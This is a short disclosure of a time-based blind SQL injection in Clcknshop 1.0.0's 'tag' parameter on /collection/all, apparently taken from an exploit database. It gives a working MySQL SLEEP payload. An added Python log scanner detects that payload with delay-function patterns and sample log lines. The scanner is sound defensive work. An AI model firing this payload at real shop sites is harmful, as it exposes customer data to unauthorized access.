Exploits / Vulnerability Discovered: 2023-10-09
Type: webapps
Platform: php
This Clcknshop 1.0.0 SQL injection exploit / vulnerability is for educational purposes only; if you use it, you do so at your own risk!
SQL injection attacks can allow unauthorized access to sensitive data and modification of
data, and can crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---
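
A defender-side check for the request described above, as an added example that is not part of the original advisory: it scans web access logs for requests to /collection/all whose tag value carries a MySQL delay function or falls outside a plain slug format. The log lines, the allowed-tag pattern and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Oct/2023:10:00:01 +0000] "GET /collection/all?tag=tshirt HTTP/1.1" 200 5120
203.0.113.9 - - [09/Oct/2023:10:00:07 +0000] "GET /collection/all?tag=tshirt%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z HTTP/1.1" 200 5120
203.0.113.5 - - [09/Oct/2023:10:00:09 +0000] "GET /collection/all?tag=summer-sale HTTP/1.1" 200 4800
203.0.113.7 - - [09/Oct/2023:10:00:11 +0000] "GET /product/42?tag=a%27b HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate tags are short slugs; adjust to the shop's real tag format.
TAG_ALLOWED = re.compile(r'^[A-Za-z0-9 _-]{1,64}$')
# Delay primitives that MySQL time-based blind tests rely on.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)

def classify_tag(value):
    """Return a verdict string for a decoded tag value, or None if it looks normal."""
    if DELAY_RE.search(value):
        return "time-based-sqli"
    if not TAG_ALLOWED.match(value):
        return "suspicious-tag"
    return None

def scan(log_text, path="/collection/all"):
    """Return (client, verdict, decoded_tag) for flagged requests to the given path."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes the value, so %27 is compared as a quote.
        for value in parse_qs(url.query, keep_blank_values=True).get("tag", []):
            verdict = classify_tag(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A time-based test also shows up as a response-time outlier, so correlating these hits with request duration, where the log format records it, reduces false positives.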